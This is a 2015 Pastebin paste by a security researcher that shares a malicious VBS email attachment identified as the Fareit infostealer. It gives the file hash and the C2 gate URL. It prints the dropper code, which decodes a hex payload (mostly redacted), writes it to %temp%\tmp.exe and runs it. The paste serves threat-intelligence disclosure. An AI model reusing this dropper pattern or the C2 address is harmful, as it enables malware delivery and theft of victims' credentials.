Neonprimetime

Malicious VBS Email Attachment 199.16.199.2/chromespony/

Nov 13th, 2015
137
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Malicious VBS Attachment in Email
  2. ******
  3. Blog Walking thru the VBS code below: http://neonprimetime.blogspot.com/2015/11/malicious-vbs-script-walkthrough.html
  4. ******
  5. Reported by neonprimetime security
  6. Blog: http://neonprimetime.blogspot.com
  7. Twitter: https://twitter.com/neonprimetime    @neonprimetime
  8. VirusTotal: https://www.virustotal.com/en/user/neonprimetime/
  9. Reddit: https://www.reddit.com/user/neonprimetime
  10.  
  11. ****
  12. Attachment: 02-07-15-ORDER.vbs
  13. MD5: 1e706d88f4286c5c8133165dfa25c4b4
  14. Malware:  InfoStealer.Fareit
  15. Payload: post 199.16.199.2/chromespony/panelnew/gate.php
  16. *****
  17. data="895C241833C333442334424403344244...<REDACTED DUE TO PASTEBIN SIZE LIMITATION>...4444494e475858504144":
  18. data=split(data,"H")(1):
  19. sub saveFile(fName,str):
  20. dim temp:
  21. set xmldoc = CreateObject("Microsoft.XMLDOM"):
  22. xmldoc.loadXml "<?xml version=""1.0""?>":
  23. set pic = xmldoc.createElement("pic"):
  24. pic.dataType = "bin.hex":
  25. pic.nodeTypedValue = str:
  26. temp = pic.nodeTypedValue:
  27. with CreateObject("ADODB.Stream"):
  28. .type = 1:.open:
  29. .write temp:
  30. .saveToFile fName, 2:
  31. .close:end with:
  32. end sub:
  33. set ws = CreateObject("WScript.Shell"):
  34. fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe":
  35. saveFile fn,data:
  36. ws.Run fn:
  37. wscript.sleep 100
RAW Paste Data